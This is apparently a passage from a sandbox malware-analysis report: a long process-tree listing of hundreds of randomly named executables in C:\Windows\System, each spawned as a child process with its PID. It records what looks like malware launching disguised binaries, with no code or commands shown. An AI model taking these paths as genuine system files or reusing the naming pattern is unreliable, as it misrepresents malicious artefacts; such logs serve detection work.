C:\Windows\System\cSHKkyj.exe
2⤵
PID:12080

C:\Windows\System\WxEuXWj.exe
C:\Windows\System\WxEuXWj.exe
2⤵
PID:12136

C:\Windows\System\xmwQnzx.exe
C:\Windows\System\xmwQnzx.exe
2⤵
PID:1200

C:\Windows\System\VIZFzES.exe
C:\Windows\System\VIZFzES.exe
2⤵
PID:12248

C:\Windows\System\HLWNTcv.exe
C:\Windows\System\HLWNTcv.exe
2⤵
PID:11312

C:\Windows\System\FErnwiM.exe
C:\Windows\System\FErnwiM.exe
2⤵
PID:11432

C:\Windows\System\VGRBWXO.exe
C:\Windows\System\VGRBWXO.exe
2⤵
PID:10476

C:\Windows\System\FXLuvNw.exe
C:\Windows\System\FXLuvNw.exe
2⤵
PID:11788

C:\Windows\System\Thceefh.exe
C:\Windows\System\Thceefh.exe
2⤵
PID:11948

C:\Windows\System\oamzAYM.exe
C:\Windows\System\oamzAYM.exe
2⤵
PID:12052

C:\Windows\System\OmgNfic.exe
C:\Windows\System\OmgNfic.exe
2⤵
PID:12176

C:\Windows\System\nPQkYlC.exe
C:\Windows\System\nPQkYlC.exe
2⤵
PID:11364

C:\Windows\System\TVGiZID.exe
C:\Windows\System\TVGiZID.exe
2⤵
PID:64

C:\Windows\System\bOVTNPC.exe
C:\Windows\System\bOVTNPC.exe
2⤵
PID:3100

C:\Windows\System\TMZYQVJ.exe
C:\Windows\System\TMZYQVJ.exe
2⤵
PID:1500

C:\Windows\System\eCDIpGr.exe
C:\Windows\System\eCDIpGr.exe
2⤵
PID:11744

C:\Windows\System\uooGwYK.exe
C:\Windows\System\uooGwYK.exe
2⤵
PID:2052

C:\Windows\System\PMaPlZB.exe
C:\Windows\System\PMaPlZB.exe
2⤵
PID:780

C:\Windows\System\HkYUzPI.exe
C:\Windows\System\HkYUzPI.exe
2⤵
PID:11408

C:\Windows\System\emuvOPX.exe
C:\Windows\System\emuvOPX.exe
2⤵
PID:12308

C:\Windows\System\kHGRate.exe
C:\Windows\System\kHGRate.exe
2⤵
PID:12328

C:\Windows\System\cvHXOUN.exe
C:\Windows\System\cvHXOUN.exe
2⤵
PID:12356

C:\Windows\System\dUFUQpB.exe
C:\Windows\System\dUFUQpB.exe
2⤵
PID:12372

C:\Windows\System\meOPNFx.exe
C:\Windows\System\meOPNFx.exe
2⤵
PID:12388

C:\Windows\System\ZHLlNBr.exe
C:\Windows\System\ZHLlNBr.exe
2⤵
PID:12416

C:\Windows\System\VDcReVp.exe
C:\Windows\System\VDcReVp.exe
2⤵
PID:12440

C:\Windows\System\EIdhkyM.exe
C:\Windows\System\EIdhkyM.exe
2⤵
PID:12456

C:\Windows\System\mGGxvCR.exe
C:\Windows\System\mGGxvCR.exe
2⤵
PID:12484

C:\Windows\System\bcKbCRN.exe
C:\Windows\System\bcKbCRN.exe
2⤵
PID:12520

C:\Windows\System\eEuULfl.exe
C:\Windows\System\eEuULfl.exe
2⤵
PID:12544

C:\Windows\System\LXfotNV.exe
C:\Windows\System\LXfotNV.exe
2⤵
PID:12584

C:\Windows\System\hdkDXdT.exe
C:\Windows\System\hdkDXdT.exe
2⤵
PID:12620

C:\Windows\System\imygpjq.exe
C:\Windows\System\imygpjq.exe
2⤵
PID:12684

C:\Windows\System\uAlRvXT.exe
C:\Windows\System\uAlRvXT.exe
2⤵
PID:12716

C:\Windows\System\mQhujdE.exe
C:\Windows\System\mQhujdE.exe
2⤵
PID:12732

C:\Windows\System\HnTuYNX.exe
C:\Windows\System\HnTuYNX.exe
2⤵
PID:12760

C:\Windows\System\xegOigR.exe
C:\Windows\System\xegOigR.exe
2⤵
PID:12788

C:\Windows\System\tkbbDhl.exe
C:\Windows\System\tkbbDhl.exe
2⤵
PID:12820

C:\Windows\System\PgpRYgv.exe
C:\Windows\System\PgpRYgv.exe
2⤵
PID:12856

C:\Windows\System\knJMbOF.exe
C:\Windows\System\knJMbOF.exe
2⤵
PID:12888

C:\Windows\System\NMpkVdq.exe
C:\Windows\System\NMpkVdq.exe
2⤵
PID:12916

C:\Windows\System\kNnQXKw.exe
C:\Windows\System\kNnQXKw.exe
2⤵
PID:12944

C:\Windows\System\WEcOfXp.exe
C:\Windows\System\WEcOfXp.exe
2⤵
PID:12960

C:\Windows\System\TWZUKKh.exe
C:\Windows\System\TWZUKKh.exe
2⤵
PID:12996

C:\Windows\System\xszpgNC.exe
C:\Windows\System\xszpgNC.exe
2⤵
PID:13044

C:\Windows\System\DVomhUh.exe
C:\Windows\System\DVomhUh.exe
2⤵
PID:13064

C:\Windows\System\cManElc.exe
C:\Windows\System\cManElc.exe
2⤵
PID:13092

C:\Windows\System\NvOCERW.exe
C:\Windows\System\NvOCERW.exe
2⤵
PID:13116

C:\Windows\System\WtkgnsU.exe
C:\Windows\System\WtkgnsU.exe
2⤵
PID:13136

C:\Windows\System\ClfZTSL.exe
C:\Windows\System\ClfZTSL.exe
2⤵
PID:13164

C:\Windows\System\ZBQvvdL.exe
C:\Windows\System\ZBQvvdL.exe
2⤵
PID:13204

C:\Windows\System\kKrjvap.exe
C:\Windows\System\kKrjvap.exe
2⤵
PID:13232

C:\Windows\System\Nmsorou.exe
C:\Windows\System\Nmsorou.exe
2⤵
PID:13248

C:\Windows\System\hYfvVrv.exe
C:\Windows\System\hYfvVrv.exe
2⤵
PID:13276

C:\Windows\System\caqABoB.exe
C:\Windows\System\caqABoB.exe
2⤵
PID:13304

C:\Windows\System\ayXFDpK.exe
C:\Windows\System\ayXFDpK.exe
2⤵
PID:12476

C:\Windows\System\RXiDYKz.exe
C:\Windows\System\RXiDYKz.exe
2⤵
PID:12580

C:\Windows\System\wqhnVfI.exe
C:\Windows\System\wqhnVfI.exe
2⤵
PID:2456

C:\Windows\System\EYghKMk.exe
C:\Windows\System\EYghKMk.exe
2⤵
PID:12640

C:\Windows\System\NgncZjv.exe
C:\Windows\System\NgncZjv.exe
2⤵
PID:12700

C:\Windows\System\AIGjgFo.exe
C:\Windows\System\AIGjgFo.exe
2⤵
PID:12744

C:\Windows\System\NtfOvAd.exe
C:\Windows\System\NtfOvAd.exe
2⤵
PID:12804

C:\Windows\System\LWTUlht.exe
C:\Windows\System\LWTUlht.exe
2⤵
PID:12852

C:\Windows\System\MOYhBob.exe
C:\Windows\System\MOYhBob.exe
2⤵
PID:12880

C:\Windows\System\VuATmuo.exe
C:\Windows\System\VuATmuo.exe
2⤵
PID:12956

C:\Windows\System\lUKdxUX.exe
C:\Windows\System\lUKdxUX.exe
2⤵
PID:4444

C:\Windows\System\AVjmoIe.exe
C:\Windows\System\AVjmoIe.exe
2⤵
PID:13288

C:\Windows\System\hoBTDEi.exe
C:\Windows\System\hoBTDEi.exe
2⤵
PID:12032

C:\Windows\System\hxkjqPG.exe
C:\Windows\System\hxkjqPG.exe
2⤵
PID:12352

C:\Windows\System\bhbKive.exe
C:\Windows\System\bhbKive.exe
2⤵
PID:3604

C:\Windows\System\lkLgxBh.exe
C:\Windows\System\lkLgxBh.exe
2⤵
PID:12680

C:\Windows\System\FYevdAB.exe
C:\Windows\System\FYevdAB.exe
2⤵
PID:12840

C:\Windows\System\AdbNCzf.exe
C:\Windows\System\AdbNCzf.exe
2⤵
PID:976

C:\Windows\System\MMnbxYK.exe
C:\Windows\System\MMnbxYK.exe
2⤵
PID:13020

C:\Windows\System\rBBNEOo.exe
C:\Windows\System\rBBNEOo.exe
2⤵
PID:13080

C:\Windows\System\PrrxUVx.exe
C:\Windows\System\PrrxUVx.exe
2⤵
PID:13128

C:\Windows\System\EgmJIVP.exe
C:\Windows\System\EgmJIVP.exe
2⤵
PID:13200

C:\Windows\System\FBXkpBc.exe
C:\Windows\System\FBXkpBc.exe
2⤵
PID:13244

C:\Windows\System\kmzstAU.exe
C:\Windows\System\kmzstAU.exe
2⤵
PID:12780

C:\Windows\System\EPCAwsE.exe
C:\Windows\System\EPCAwsE.exe
2⤵
PID:13264

C:\Windows\System\ZTwjzRe.exe
C:\Windows\System\ZTwjzRe.exe
2⤵
PID:12336

C:\Windows\System\bPyCUfB.exe
C:\Windows\System\bPyCUfB.exe
2⤵
PID:12596

C:\Windows\System\mneyZji.exe
C:\Windows\System\mneyZji.exe
2⤵
PID:13052

C:\Windows\System\iebFnyW.exe
C:\Windows\System\iebFnyW.exe
2⤵
PID:13148

C:\Windows\System\RfIUSvK.exe
C:\Windows\System\RfIUSvK.exe
2⤵
PID:13260

C:\Windows\System\rZdnjYf.exe
C:\Windows\System\rZdnjYf.exe
2⤵
PID:12636

C:\Windows\System\fVYsbsH.exe
C:\Windows\System\fVYsbsH.exe
2⤵
PID:12348

C:\Windows\System\kCmDoxh.exe
C:\Windows\System\kCmDoxh.exe
2⤵
PID:13216

C:\Windows\System\zmobBZt.exe
C:\Windows\System\zmobBZt.exe
2⤵
PID:13356

C:\Windows\System\KNGTjtq.exe
C:\Windows\System\KNGTjtq.exe
2⤵
PID:13440

C:\Windows\System\JtXodlJ.exe
C:\Windows\System\JtXodlJ.exe
2⤵
PID:13476

C:\Windows\System\DQGylqH.exe
C:\Windows\System\DQGylqH.exe
2⤵
PID:13520

C:\Windows\System\epXVQGv.exe
C:\Windows\System\epXVQGv.exe
2⤵
PID:13572

C:\Windows\System\LZSkcZo.exe
C:\Windows\System\LZSkcZo.exe
2⤵
PID:13592

C:\Windows\System\DpxpHIM.exe
C:\Windows\System\DpxpHIM.exe
2⤵
PID:13640

C:\Windows\System\OnZrrFZ.exe
C:\Windows\System\OnZrrFZ.exe
2⤵
PID:13680

C:\Windows\System\KSGdfuq.exe
C:\Windows\System\KSGdfuq.exe
2⤵
PID:13696

C:\Windows\System\iVTsukI.exe
C:\Windows\System\iVTsukI.exe
2⤵
PID:13780

C:\Windows\System\KBPbTwu.exe
C:\Windows\System\KBPbTwu.exe
2⤵
PID:13840

C:\Windows\System\eNOLjjm.exe
C:\Windows\System\eNOLjjm.exe
2⤵
PID:13908

C:\Windows\System\wAbEScB.exe
C:\Windows\System\wAbEScB.exe
2⤵
PID:13940

C:\Windows\System\MIlOWon.exe
C:\Windows\System\MIlOWon.exe
2⤵
PID:13972

C:\Windows\System\nLcRNCB.exe
C:\Windows\System\nLcRNCB.exe
2⤵
PID:14024

C:\Windows\System\drmcaGX.exe
C:\Windows\System\drmcaGX.exe
2⤵
PID:14060

C:\Windows\System\HsFhPHs.exe
C:\Windows\System\HsFhPHs.exe
2⤵
PID:13104

C:\Windows\System\GNeuYPa.exe
C:\Windows\System\GNeuYPa.exe
2⤵
PID:14220

C:\Windows\System\EjmLuaZ.exe
C:\Windows\System\EjmLuaZ.exe
2⤵
PID:14268

C:\Windows\System\uHMshIh.exe
C:\Windows\System\uHMshIh.exe
2⤵
PID:13676

C:\Windows\System\LUHOGsR.exe
C:\Windows\System\LUHOGsR.exe
2⤵
PID:6664

C:\Windows\System\AmNZxIY.exe
C:\Windows\System\AmNZxIY.exe
2⤵
PID:7280

C:\Windows\System\gerqNba.exe
C:\Windows\System\gerqNba.exe
2⤵
PID:7320

C:\Windows\System\CHrpOXw.exe
C:\Windows\System\CHrpOXw.exe
2⤵
PID:4528

C:\Windows\System\vQLDxeU.exe
C:\Windows\System\vQLDxeU.exe
2⤵
PID:14212

C:\Windows\System\vCJeWGI.exe
C:\Windows\System\vCJeWGI.exe
2⤵
PID:5408

C:\Windows\System\WQPAnqY.exe
C:\Windows\System\WQPAnqY.exe
2⤵
PID:5436

C:\Windows\System\dxqBiKM.exe
C:\Windows\System\dxqBiKM.exe
2⤵
PID:7448

C:\Windows\System\BVChDID.exe
C:\Windows\System\BVChDID.exe
2⤵
PID:6244

C:\Windows\System\cnlRleh.exe
C:\Windows\System\cnlRleh.exe
2⤵
PID:6988

C:\Windows\System\iQzPMoZ.exe
C:\Windows\System\iQzPMoZ.exe
2⤵
PID:8504

C:\Windows\System\YlSqhfj.exe
C:\Windows\System\YlSqhfj.exe
2⤵
PID:3944

C:\Windows\System\GMRzQXU.exe
C:\Windows\System\GMRzQXU.exe
2⤵
PID:13852

C:\Windows\System\PylaEIR.exe
C:\Windows\System\PylaEIR.exe
2⤵
PID:13884

C:\Windows\System\lPKRIIT.exe
C:\Windows\System\lPKRIIT.exe
2⤵
PID:13864

C:\Windows\System\quPWNhi.exe
C:\Windows\System\quPWNhi.exe
2⤵
PID:5912

C:\Windows\System\vpPdOgf.exe
C:\Windows\System\vpPdOgf.exe
2⤵
PID:6440

C:\Windows\System\kPSTpJf.exe
C:\Windows\System\kPSTpJf.exe
2⤵
PID:6648

C:\Windows\System\dGHIumx.exe
C:\Windows\System\dGHIumx.exe
2⤵
PID:5932

C:\Windows\System\pCymxea.exe
C:\Windows\System\pCymxea.exe
2⤵
PID:13848

C:\Windows\System\LKVdPCm.exe
C:\Windows\System\LKVdPCm.exe
2⤵
PID:6016

C:\Windows\System\RgbRaLd.exe
C:\Windows\System\RgbRaLd.exe
2⤵
PID:2252

C:\Windows\System\xxiRdRs.exe
C:\Windows\System\xxiRdRs.exe
2⤵
PID:968

C:\Windows\System\kMwfEVj.exe
C:\Windows\System\kMwfEVj.exe
2⤵
PID:5124

C:\Windows\System\qzcfequ.exe
C:\Windows\System\qzcfequ.exe
2⤵
PID:2764

C:\Windows\System\TFyskcX.exe
C:\Windows\System\TFyskcX.exe
2⤵
PID:6344

C:\Windows\System\fjRVfuC.exe
C:\Windows\System\fjRVfuC.exe
2⤵
PID:6548

C:\Windows\System\RnOMXNf.exe
C:\Windows\System\RnOMXNf.exe
2⤵
PID:9460

C:\Windows\System\hGqFZva.exe
C:\Windows\System\hGqFZva.exe
2⤵
PID:13948

C:\Windows\System\aQUjeVF.exe
C:\Windows\System\aQUjeVF.exe
2⤵
PID:4692

C:\Windows\System\iCItQrp.exe
C:\Windows\System\iCItQrp.exe
2⤵
PID:5252

C:\Windows\System\YvNpDqJ.exe
C:\Windows\System\YvNpDqJ.exe
2⤵
PID:9560

C:\Windows\System\HPpjYJD.exe
C:\Windows\System\HPpjYJD.exe
2⤵
PID:9596

C:\Windows\System\gtONRBH.exe
C:\Windows\System\gtONRBH.exe
2⤵
PID:5832

C:\Windows\System\EoGCLzK.exe
C:\Windows\System\EoGCLzK.exe
2⤵
PID:5268

C:\Windows\System\FLunKkO.exe
C:\Windows\System\FLunKkO.exe
2⤵
PID:9680

C:\Windows\System\jeThahL.exe
C:\Windows\System\jeThahL.exe
2⤵
PID:5308

C:\Windows\System\RtNinIc.exe
C:\Windows\System\RtNinIc.exe
2⤵
PID:932

C:\Windows\System\vIdkUHU.exe
C:\Windows\System\vIdkUHU.exe
2⤵
PID:2028

C:\Windows\System\MSmfWuC.exe
C:\Windows\System\MSmfWuC.exe
2⤵
PID:9756

C:\Windows\System\UCKzNqS.exe
C:\Windows\System\UCKzNqS.exe
2⤵
PID:4128

C:\Windows\System\HEzYQuZ.exe
C:\Windows\System\HEzYQuZ.exe
2⤵
PID:2248

C:\Windows\System\LzrQohB.exe
C:\Windows\System\LzrQohB.exe
2⤵
PID:9900

C:\Windows\System\LAKpOfT.exe
C:\Windows\System\LAKpOfT.exe
2⤵
PID:2752

C:\Windows\System\JbojyVf.exe
C:\Windows\System\JbojyVf.exe
2⤵
PID:10016

C:\Windows\System\UvVEXIJ.exe
C:\Windows\System\UvVEXIJ.exe
2⤵
PID:1316

C:\Windows\System\xokZjpJ.exe
C:\Windows\System\xokZjpJ.exe
2⤵
PID:10148

C:\Windows\System\efCjPCh.exe
C:\Windows\System\efCjPCh.exe
2⤵
PID:10160

C:\Windows\System\tqReMgy.exe
C:\Windows\System\tqReMgy.exe
2⤵
PID:9568

C:\Windows\System\eZrpxvC.exe
C:\Windows\System\eZrpxvC.exe
2⤵
PID:7512

C:\Windows\System\VJrcfNg.exe
C:\Windows\System\VJrcfNg.exe
2⤵
PID:14332

C:\Windows\System\nnAGByL.exe
C:\Windows\System\nnAGByL.exe
2⤵
PID:13532

C:\Windows\System\DVRfOtK.exe
C:\Windows\System\DVRfOtK.exe
2⤵
PID:4024

C:\Windows\System\GIAcEwp.exe
C:\Windows\System\GIAcEwp.exe
2⤵
PID:840

C:\Windows\System\ODcrOmU.exe
C:\Windows\System\ODcrOmU.exe
2⤵
PID:14320

C:\Windows\System\ZxutfzN.exe
C:\Windows\System\ZxutfzN.exe
2⤵
PID:5496

C:\Windows\System\BubtDCe.exe
C:\Windows\System\BubtDCe.exe
2⤵
PID:7496

C:\Windows\System\PTUDNLL.exe
C:\Windows\System\PTUDNLL.exe
2⤵
PID:5572

C:\Windows\System\jsYoeQA.exe
C:\Windows\System\jsYoeQA.exe
2⤵
PID:6412

C:\Windows\System\djaoUoc.exe
C:\Windows\System\djaoUoc.exe
2⤵
PID:13416

C:\Windows\System\wIvNnGb.exe
C:\Windows\System\wIvNnGb.exe
2⤵
PID:952

C:\Windows\System\eXuOUVN.exe
C:\Windows\System\eXuOUVN.exe
2⤵
PID:10084

C:\Windows\System\WRxtKkj.exe
C:\Windows\System\WRxtKkj.exe
2⤵
PID:10232

C:\Windows\System\ccqXdJf.exe
C:\Windows\System\ccqXdJf.exe
2⤵
PID:9304

C:\Windows\System\uWoofde.exe
C:\Windows\System\uWoofde.exe
2⤵
PID:6488

C:\Windows\System\VpKVXfK.exe
C:\Windows\System\VpKVXfK.exe
2⤵
PID:13432

C:\Windows\System\eOIKAEF.exe
C:\Windows\System\eOIKAEF.exe
2⤵
PID:5636

C:\Windows\System\DnAVWhk.exe
C:\Windows\System\DnAVWhk.exe
2⤵
PID:7840

C:\Windows\System\qCHUXus.exe
C:\Windows\System\qCHUXus.exe
2⤵
PID:5692

C:\Windows\System\oLWpSeO.exe
C:\Windows\System\oLWpSeO.exe
2⤵
PID:10112

C:\Windows\System\orSmSol.exe
C:\Windows\System\orSmSol.exe
2⤵
PID:4828

C:\Windows\System\jTKwfGM.exe
C:\Windows\System\jTKwfGM.exe
2⤵
PID:13496

C:\Windows\System\wIFsCdQ.exe
C:\Windows\System\wIFsCdQ.exe
2⤵
PID:5712

C:\Windows\System\eehUnri.exe
C:\Windows\System\eehUnri.exe
2⤵
PID:6652

C:\Windows\System\Mkwhoin.exe
C:\Windows\System\Mkwhoin.exe
2⤵
PID:7972

C:\Windows\System\PtBcCsU.exe
C:\Windows\System\PtBcCsU.exe
2⤵
PID:8072

C:\Windows\System\WVbjIGQ.exe
C:\Windows\System\WVbjIGQ.exe
2⤵
PID:8160

C:\Windows\System\UxrEFZR.exe
C:\Windows\System\UxrEFZR.exe
2⤵
PID:8176

C:\Windows\System\fLboupt.exe
C:\Windows\System\fLboupt.exe
2⤵
PID:10332

C:\Windows\System\GKHUsZc.exe
C:\Windows\System\GKHUsZc.exe
2⤵
PID:7540

C:\Windows\System\eLpbUEo.exe
C:\Windows\System\eLpbUEo.exe
2⤵
PID:7692

C:\Windows\System\vwLsJxO.exe
C:\Windows\System\vwLsJxO.exe
2⤵
PID:7812

C:\Windows\System\sBrzQOy.exe
C:\Windows\System\sBrzQOy.exe
2⤵
PID:10452

C:\Windows\System\MBcQXIh.exe
C:\Windows\System\MBcQXIh.exe
2⤵
PID:7204

C:\Windows\System\liZHxCl.exe
C:\Windows\System\liZHxCl.exe
2⤵
PID:7544

C:\Windows\System\QpEBZsa.exe
C:\Windows\System\QpEBZsa.exe
2⤵
PID:7772

C:\Windows\System\kPBjHmO.exe
C:\Windows\System\kPBjHmO.exe
2⤵
PID:7464

C:\Windows\System\gMABEvn.exe
C:\Windows\System\gMABEvn.exe
2⤵
PID:7828

C:\Windows\System\UBbWSgn.exe
C:\Windows\System\UBbWSgn.exe
2⤵
PID:3748

C:\Windows\System\yePEXTW.exe
C:\Windows\System\yePEXTW.exe
2⤵
PID:10612

C:\Windows\System\wEKpyaZ.exe
C:\Windows\System\wEKpyaZ.exe
2⤵
PID:12344

C:\Windows\System\MkTVaHh.exe
C:\Windows\System\MkTVaHh.exe
2⤵
PID:10640

C:\Windows\System\moJwiEx.exe
C:\Windows\System\moJwiEx.exe
2⤵
PID:10696

C:\Windows\System\TpUgDEn.exe
C:\Windows\System\TpUgDEn.exe
2⤵
PID:10844

C:\Windows\System\tIcwCiZ.exe
C:\Windows\System\tIcwCiZ.exe
2⤵
PID:10932

C:\Windows\System\OxhOjga.exe
C:\Windows\System\OxhOjga.exe
2⤵
PID:11032

C:\Windows\System\aWxntHA.exe
C:\Windows\System\aWxntHA.exe
2⤵
PID:11120

C:\Windows\System\xLckbbY.exe
C:\Windows\System\xLckbbY.exe
2⤵
PID:11144

C:\Windows\System\RTVTpIk.exe
C:\Windows\System\RTVTpIk.exe
2⤵
PID:10412

C:\Windows\System\OCqyWBw.exe
C:\Windows\System\OCqyWBw.exe
2⤵
PID:10644

C:\Windows\System\pYVvyIm.exe
C:\Windows\System\pYVvyIm.exe
2⤵
PID:10784

C:\Windows\System\OZZWOMn.exe
C:\Windows\System\OZZWOMn.exe
2⤵
PID:10928

C:\Windows\System\BvdsUFm.exe
C:\Windows\System\BvdsUFm.exe
2⤵
PID:8500

C:\Windows\System\CaehGpc.exe
C:\Windows\System\CaehGpc.exe
2⤵
PID:6708

C:\Windows\System\WJcAUDF.exe
C:\Windows\System\WJcAUDF.exe
2⤵
PID:11244

C:\Windows\System\FDVgpUI.exe
C:\Windows\System\FDVgpUI.exe
2⤵
PID:8584

C:\Windows\System\FsutyJJ.exe
C:\Windows\System\FsutyJJ.exe
2⤵
PID:6748

C:\Windows\System\ssKOxgj.exe
C:\Windows\System\ssKOxgj.exe
2⤵
PID:13556

C:\Windows\System\jMJehxP.exe
C:\Windows\System\jMJehxP.exe
2⤵
PID:8668

C:\Windows\System\YoyWdIe.exe
C:\Windows\System\YoyWdIe.exe
2⤵
PID:3064

C:\Windows\System\fltIFgI.exe
C:\Windows\System\fltIFgI.exe
2⤵
PID:11188

C:\Windows\System\AodheIk.exe
C:\Windows\System\AodheIk.exe
2⤵
PID:8716

C:\Windows\System\Nraalph.exe
C:\Windows\System\Nraalph.exe
2⤵
PID:10528

C:\Windows\System\AmXlRFs.exe
C:\Windows\System\AmXlRFs.exe
2⤵
PID:10652

C:\Windows\System\mywFLNG.exe
C:\Windows\System\mywFLNG.exe
2⤵
PID:8760

C:\Windows\System\MULXwmP.exe
C:\Windows\System\MULXwmP.exe
2⤵
PID:10988

C:\Windows\System\eMuOtRP.exe
C:\Windows\System\eMuOtRP.exe
2⤵
PID:1168

C:\Windows\System\XUzymdR.exe
C:\Windows\System\XUzymdR.exe
2⤵
PID:13636

C:\Windows\System\DwgreLB.exe
C:\Windows\System\DwgreLB.exe
2⤵
PID:5928

C:\Windows\System\KYzLlRf.exe
C:\Windows\System\KYzLlRf.exe
2⤵
PID:4776

C:\Windows\System\ylRgXDE.exe
C:\Windows\System\ylRgXDE.exe
2⤵
PID:5984

C:\Windows\System\LyeoKhk.exe
C:\Windows\System\LyeoKhk.exe
2⤵
PID:7016

C:\Windows\System\TZzrZJD.exe
C:\Windows\System\TZzrZJD.exe
2⤵
PID:8996

C:\Windows\System\JktKlmx.exe
C:\Windows\System\JktKlmx.exe
2⤵
PID:11500

C:\Windows\System\wqVHLMK.exe
C:\Windows\System\wqVHLMK.exe
2⤵
PID:9036

C:\Windows\System\HJCbJmA.exe
C:\Windows\System\HJCbJmA.exe
2⤵
PID:916

C:\Windows\System\oUVcQVX.exe
C:\Windows\System\oUVcQVX.exe
2⤵
PID:13668

C:\Windows\System\shhPdMc.exe
C:\Windows\System\shhPdMc.exe
2⤵
PID:9148

C:\Windows\System\qvuGanS.exe
C:\Windows\System\qvuGanS.exe
2⤵
PID:2732

C:\Windows\System\VDfrUur.exe
C:\Windows\System\VDfrUur.exe
2⤵
PID:11652

C:\Windows\System\IIwwUAt.exe
C:\Windows\System\IIwwUAt.exe
2⤵
PID:9188

C:\Windows\System\nbUbapj.exe
C:\Windows\System\nbUbapj.exe
2⤵
PID:6132

C:\Windows\System\IiRCoZh.exe
C:\Windows\System\IiRCoZh.exe
2⤵
PID:13740

C:\Windows\System\iaNXwWg.exe
C:\Windows\System\iaNXwWg.exe
2⤵
PID:13712

C:\Windows\System\pNFMIyW.exe
C:\Windows\System\pNFMIyW.exe
2⤵
PID:13732

C:\Windows\System\BpLbssB.exe
C:\Windows\System\BpLbssB.exe
2⤵
PID:1900

C:\Windows\System\aFSdesk.exe
C:\Windows\System\aFSdesk.exe
2⤵
PID:11808

C:\Windows\System\pnAoKIv.exe
C:\Windows\System\pnAoKIv.exe
2⤵
PID:11844

C:\Windows\System\JluQejv.exe
C:\Windows\System\JluQejv.exe
2⤵
PID:8436

C:\Windows\System\pYfqTpo.exe
C:\Windows\System\pYfqTpo.exe
2⤵
PID:5196

C:\Windows\System\yrTZXMM.exe
C:\Windows\System\yrTZXMM.exe
2⤵
PID:13748

C:\Windows\System\wLgWonA.exe
C:\Windows\System\wLgWonA.exe
2⤵
PID:8712

C:\Windows\System\RuwYRCO.exe
C:\Windows\System\RuwYRCO.exe
2⤵
PID:11984

C:\Windows\System\ibhpaUD.exe
C:\Windows\System\ibhpaUD.exe
2⤵
PID:8764

C:\Windows\System\sTURXVy.exe
C:\Windows\System\sTURXVy.exe
2⤵
PID:6568

C:\Windows\System\nBjrlMw.exe
C:\Windows\System\nBjrlMw.exe
2⤵
PID:8860

C:\Windows\System\NwpgutW.exe
C:\Windows\System\NwpgutW.exe
2⤵
PID:6700

C:\Windows\System\JnzNLai.exe
C:\Windows\System\JnzNLai.exe
2⤵
PID:5524

C:\Windows\System\YrTnqBc.exe
C:\Windows\System\YrTnqBc.exe
2⤵
PID:9032

C:\Windows\System\iFApZdp.exe
C:\Windows\System\iFApZdp.exe
2⤵
PID:4544

C:\Windows\System\CrfxivB.exe
C:\Windows\System\CrfxivB.exe
2⤵
PID:5616

C:\Windows\System\uoisOJj.exe
C:\Windows\System\uoisOJj.exe
2⤵
PID:6952

C:\Windows\System\kqiozHy.exe
C:\Windows\System\kqiozHy.exe
2⤵
PID:12172

C:\Windows\System\qPVCqhp.exe
C:\Windows\System\qPVCqhp.exe
2⤵
PID:5640

C:\Windows\System\zCcTUpI.exe
C:\Windows\System\zCcTUpI.exe
2⤵
PID:8252

C:\Windows\System\qTXVNhh.exe
C:\Windows\System\qTXVNhh.exe
2⤵
PID:12232

C:\Windows\System\ZXCkejo.exe
C:\Windows\System\ZXCkejo.exe
2⤵
PID:11268

C:\Windows\System\IRwBlwv.exe
C:\Windows\System\IRwBlwv.exe
2⤵
PID:3700

C:\Windows\System\zMYGEWP.exe
C:\Windows\System\zMYGEWP.exe
2⤵
PID:11472

C:\Windows\System\kucVmpI.exe
C:\Windows\System\kucVmpI.exe
2⤵
PID:4056

C:\Windows\System\knCnKtu.exe
C:\Windows\System\knCnKtu.exe
2⤵
PID:3888

C:\Windows\System\MRkZngm.exe
C:\Windows\System\MRkZngm.exe
2⤵
PID:13868

C:\Windows\System\fjaxKnj.exe
C:\Windows\System\fjaxKnj.exe
2⤵
PID:11976

C:\Windows\System\mzmMzox.exe
C:\Windows\System\mzmMzox.exe
2⤵
PID:13900

C:\Windows\System\vftitSN.exe
C:\Windows\System\vftitSN.exe
2⤵
PID:12192

C:\Windows\System\KHemfZV.exe
C:\Windows\System\KHemfZV.exe
2⤵
PID:5968

C:\Windows\System\jMqkGom.exe
C:\Windows\System\jMqkGom.exe
2⤵
PID:11656

C:\Windows\System\BXLOIPW.exe
C:\Windows\System\BXLOIPW.exe
2⤵
PID:12220

C:\Windows\System\MEheMAu.exe
C:\Windows\System\MEheMAu.exe
2⤵
PID:4468

C:\Windows\System\BPtlloj.exe
C:\Windows\System\BPtlloj.exe
2⤵
PID:4600

C:\Windows\System\EVwrvwN.exe
C:\Windows\System\EVwrvwN.exe
2⤵
PID:4036

C:\Windows\System\Aavmxli.exe
C:\Windows\System\Aavmxli.exe
2⤵
PID:12464

C:\Windows\System\CRJGcsX.exe
C:\Windows\System\CRJGcsX.exe
2⤵
PID:12572

C:\Windows\System\rHDTkwK.exe
C:\Windows\System\rHDTkwK.exe
2⤵
PID:12664

C:\Windows\System\oVSnFgS.exe
C:\Windows\System\oVSnFgS.exe
2⤵
PID:12748

C:\Windows\System\PpKIUQe.exe
C:\Windows\System\PpKIUQe.exe
2⤵
PID:13004

C:\Windows\System\dTTBLGC.exe
C:\Windows\System\dTTBLGC.exe
2⤵
PID:9472

C:\Windows\System\rQGachj.exe
C:\Windows\System\rQGachj.exe
2⤵
PID:732

C:\Windows\System\rouLuft.exe
C:\Windows\System\rouLuft.exe
2⤵
PID:13196

C:\Windows\System\ZKZwUOC.exe
C:\Windows\System\ZKZwUOC.exe
2⤵
PID:13272

C:\Windows\System\RrZTQAp.exe
C:\Windows\System\RrZTQAp.exe
2⤵
PID:13284

C:\Windows\System\SvxrIjf.exe
C:\Windows\System\SvxrIjf.exe
2⤵
PID:12292

C:\Windows\System\KQdOwpv.exe
C:\Windows\System\KQdOwpv.exe
2⤵
PID:1932

C:\Windows\System\YWyLtWu.exe
C:\Windows\System\YWyLtWu.exe
2⤵
PID:1220

C:\Windows\System\OXEKRQV.exe
C:\Windows\System\OXEKRQV.exe
2⤵
PID:14000

C:\Windows\System\jaNunGI.exe
C:\Windows\System\jaNunGI.exe
2⤵
PID:6000

C:\Windows\System\xgFwnmG.exe
C:\Windows\System\xgFwnmG.exe
2⤵
PID:1424

C:\Windows\System\NLjIjhY.exe
C:\Windows\System\NLjIjhY.exe
2⤵
PID:8372

C:\Windows\System\NlAKiwt.exe
C:\Windows\System\NlAKiwt.exe
2⤵
PID:14044

C:\Windows\System\XSqboJt.exe
C:\Windows\System\XSqboJt.exe
2⤵
PID:14160

C:\Windows\System\eltRXzm.exe
C:\Windows\System\eltRXzm.exe
2⤵
PID:14188

C:\Windows\System\hDaEnuK.exe
